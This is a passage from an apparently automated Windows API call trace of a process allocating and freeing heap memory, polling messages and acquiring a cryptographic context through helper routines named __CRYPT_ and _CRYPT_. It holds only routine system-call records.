cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0266.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0266.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0266.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0266.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d48 [0266.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0266.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0266.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0266.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0266.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51928 [0266.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545a8 [0266.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0266.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0266.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0266.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545f8 [0266.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0266.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0266.949] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0266.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0266.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0266.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0266.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0266.949] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0266.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0266.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0266.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545f8 | out: hHeap=0x970000) returned 1 [0266.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0266.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545a8 | out: hHeap=0x970000) returned 1 [0266.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0266.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0266.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0266.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0266.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0266.950] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0266.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0266.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0266.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0266.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0266.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545a8 [0266.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0266.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0266.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0266.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0266.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0266.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0266.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0266.950] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0266.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0266.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0266.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545f8 [0266.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0266.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0266.951] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0266.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0266.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0266.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0266.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0266.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0266.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0266.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0266.951] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.951] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0266.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0266.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0266.951] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0266.951] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.952] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0266.952] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e699c8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0266.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0266.952] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0266.952] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69928, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0266.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0266.952] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0266.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f153a0 [0266.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0266.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0266.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0266.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0266.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0266.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0266.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0266.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0266.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0266.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0266.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0266.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0266.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0266.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0266.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0266.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0266.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0266.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0266.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0266.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0266.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0266.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0266.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0266.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0266.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0266.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0266.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0266.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0266.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0266.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0266.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0266.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0266.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0266.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0266.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0266.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0266.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0266.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0266.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0266.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0266.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0266.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0266.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0266.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0266.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0266.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0266.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0266.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0266.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0266.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545f8 | out: hHeap=0x970000) returned 1 [0266.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0266.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0266.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0266.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0266.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0266.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0266.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0266.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0266.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0266.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0266.959] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0266.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0266.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0266.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0266.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0266.959] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0266.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0266.960] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0266.960] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0266.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0266.960] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0266.960] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.960] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.960] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0266.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0266.960] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0266.960] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0266.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0266.960] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0266.960] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0266.961] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0266.961] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0266.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0266.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0266.961] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0266.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0266.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0266.961] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0266.961] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0266.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0266.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0266.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0266.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0266.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0266.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0266.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0266.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0266.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0266.962] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0266.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0266.962] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0266.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0266.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0266.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0266.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0266.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0266.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0266.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0266.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0266.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0266.962] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0266.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0266.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0266.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0266.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0266.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0266.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0266.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0266.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0266.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0266.963] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0266.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0266.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0266.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0266.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0266.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0266.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0266.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0266.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0266.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0266.963] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0266.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0266.963] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0266.963] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0266.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0266.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0266.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0266.963] 